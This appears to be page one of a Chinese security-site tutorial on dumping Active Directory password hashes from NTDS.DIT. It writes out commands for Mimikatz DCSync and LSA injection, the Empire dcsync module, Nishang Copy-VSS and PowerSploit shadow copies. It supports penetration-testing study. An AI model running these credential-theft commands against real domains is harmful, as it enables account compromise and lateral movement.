欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

导出域密码哈希值的多种方法介绍

来源:本站整理 作者:佚名 时间:2018-07-25 TAG: 我要投稿

在域内HASH是存在NTDS.DIT中的, NTDS.DIT是一个二进制文件,就等同于本地计算机的SAM文件,它的存放位置是%SystemRoot%\ntds\NTDS.DIT。这里面包含的不只是Username和HASH,还有OU、Group等信息。
和SAM文件一样,该文件也是被系统锁定的。因此,我们也无法直接将其复制并拷贝至其它位置,以提取其中的信息。
以下是几种最常见的被用于提取.dit文件信息的技术:
1.Domain Controller Replication Services(域控制器复制服务)
2.Native Windows Binaries
3.WMI
Mimikatz
Mimikatz有一个功能(dcsync),利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值。该技术消除了直接从域控制器进行认证的必要性,因为它可以从域管理员环境中属于域的任意系统执行。因此,这也是一项用于红队的标准技术。
lsadump::dcsync /domain:pentestlab.local /all /csv

通过使用/user参数指定域用户名,Mimikatz会将该指定用户的所有帐户信息转储包括哈希值。
lsadump::dcsync /domain:pentestlab.local /user:test

或者我们可以直接在域控制器中执行Mimikatz,通过lsass.exe进程dump密码哈希。
privilege::debug
lsadump::lsa /inject

此时,将会检索域用户的密码哈希值。

Empire
PowerShell Empire有两个模块,可以通过DCSync攻击检索域哈希。 这两个模块都需要以域管理员的权限执行,并且他们都使用Microsoft复制服务。这两个模块依赖于Invoke-Mimikatz PowerShell脚本,来执行与DCSync相关的Mimikatz命令。以下模块的哈希提取格式类似于Metasploit hashdump的输出格式。
usemodule credentials/mimikatz/dcsync_hashdump

DCSync模块需要我们指定用户,以提取帐户的所有信息。

执行完成后,我们将获取到以下信息:

Nishang
Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合,并被广泛应用于渗透测试的各个阶段。Copy-VSS脚本可用于自动化的提取需要的文件:NTDS.DIT,SAM和SYSTEM。这些文件将被提取到当前的工作目录或你指定的文件夹中。
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\

或者,可以通过加载PowerShell扩展,来从现有的Meterpreter会话中执行脚本。
load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS

也可以使用powershell_shell命令建立一个PowerShell会话,通过导入脚本来提取文件。
Copy-VSS
Copy-VSS -DestinationDir C:\Ninja

PowerSploit
PowerSploit包含PowerShell脚本,该脚本使用卷影复制服务创建可用于提取文件的新卷。
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy

或者通过加载PowerShell扩展,从现有的Meterpreter会话中执行。
powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VOlumeShadowCopy

可以使用copy命令将文件从新卷复制到目标。
Invoke-DCSync
Invoke-DCSync是一个由Nick Landers和leverages PowerView开发的PowerShell脚本,Invoke-ReflectivePEInjection和PowerKatcher使用Mimikatz的DCSync方法来检索哈希值。直接执行该函数将生成以下输出:

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载